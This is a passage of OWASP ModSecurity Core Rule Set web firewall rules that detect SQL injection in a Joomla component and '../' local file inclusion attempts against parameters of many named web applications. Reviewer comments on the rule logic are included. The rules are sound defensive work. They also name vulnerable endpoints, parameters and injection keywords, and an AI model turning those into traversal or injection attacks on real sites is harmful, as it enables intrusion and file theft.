"(?i:\\x2e\\x2e\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla jfeedback Component controller parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013467) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013467,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013468) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013468,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter DELETE FROM SQL Injection 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013469) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013469,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013470) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013470,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2013471) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013471,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule ARGS:userid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_JOOMLA_RULES ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_lfi_attacks.conf�������0000664�0000000�0000000�00000464405�12164572564�0033065�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. 
# # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_lfi.data" "id:'2000001',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_LFI_RULES" # (2009377) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion SecRule REQUEST_LINE "@contains /container.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009377,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009380) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009380,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme_directory "@contains ../" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# NOTE(review): each rule in this section is a chain. The first SecRule holds the
# metadata and the disruptive action (phase:2, block, id, msg, severity, tags); the
# last SecRule is evaluated only after every earlier link matched and is the one
# that adds tx.critical_anomaly_score to tx.anomaly_score and stores the matched
# variable under a tx.<rule id>-WEB_ATTACK/LFI-... key.
# NOTE(review): the middle link, REQUEST_LINE "@contains GET ", is a substring
# test on the whole request line rather than a method check; REQUEST_METHOD
# "@streq GET" would state the intent exactly. Because of this link the rules
# only score GET requests, while ARGS also holds request-body parameters --
# confirm that leaving other methods to the generic rules is intended.

# (2009904) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /latestposts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009904,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:forumspath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009195) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /main.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009195,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:mj_config[src_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion
SecRule REQUEST_LINE "@contains /block_center_down.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009417,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:row_mysql_blocks_center_down[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009418) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion
SecRule REQUEST_LINE "@contains /block_center_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009418,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:row_mysql_blocks_center_top[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009420) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion
SecRule REQUEST_LINE "@contains /block_left.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009420,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:row_mysql_blocks_left[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009421) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion
SecRule REQUEST_LINE "@contains /block_right.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009421,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:row_mysql_blocks_right[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009422) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion
SecRule REQUEST_LINE "@contains /window_down.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009422,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:row_mysql_bloginfo[theme] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009423) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion
SecRule REQUEST_LINE "@contains /window_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009423,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:row_mysql_bloginfo[theme] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /spaw_control.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009429,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30042'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:spaw_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009764) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /portfolio/css.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009764,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32218'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:theme "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /dm-albums/template/album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010025,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35521'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:SECURITY_FILE "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009324) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /urheber.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009324,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33933'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:name "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion
SecRule REQUEST_LINE "@contains /doku.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009876,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35095'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:config_cascade[main][default][] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008832) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion
# NOTE(review): the last link does not look at ARGS:path itself. It counts TX
# variables whose name matches /DIR_TRAVERSAL.*ARGS:path/, which have to be set
# earlier in the same transaction by a rule outside this section (presumably the
# generic directory-traversal rule -- confirm). The rule is silent if that rule is
# disabled or runs later.
SecRule REQUEST_LINE "@contains /show_joined.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008832,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/DIR_TRAVERSAL.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /threadstop/threadstop.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009428,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28686'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:exbb[default_lang] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010800) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt
# NOTE(review): the chain starter sets capture and logdata:'%{TX.0}', but the
# operators used in this chain are @contains only. As far as I know capture fills
# TX.0 for @rx-style operators, not for @contains, so logdata is probably empty --
# TODO confirm; %{MATCHED_VAR} would log the offending value. The same action list
# is used by the other rules in this section.
SecRule REQUEST_LINE "@contains /acopia/manager/DiagLogListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010800,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:logFile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010801) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /acopia/manager/DiagCaptureFileListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010801,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:captureFile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010802) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /acopia/sat/ViewSatReport.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010802,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:fileName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010803) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do capture parameter LFI Attempt
SecRule REQUEST_LINE "@contains /acopia/manager/DiagCaptureFileListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010803,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do capture parameter LFI Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:capture "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do capture parameter LFI Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010804) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /acopia/sat/ViewInventoryErrorReport.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010804,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:fileName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009507) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /sitemap.xml.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009507,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:dir[classes] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009745) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /pmscript.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009745,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34734'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:with "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008878) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion
# NOTE(review): the last link does not inspect ARGS:API_HOME_DIR directly. It
# counts TX variables whose name matches /DIR_TRAVERSAL.*ARGS:API_HOME_DIR/, so it
# depends on another rule (not in this section; presumably the generic
# directory-traversal rule -- confirm) having flagged that argument earlier in the
# same transaction.
SecRule REQUEST_LINE "@contains /init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008878,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
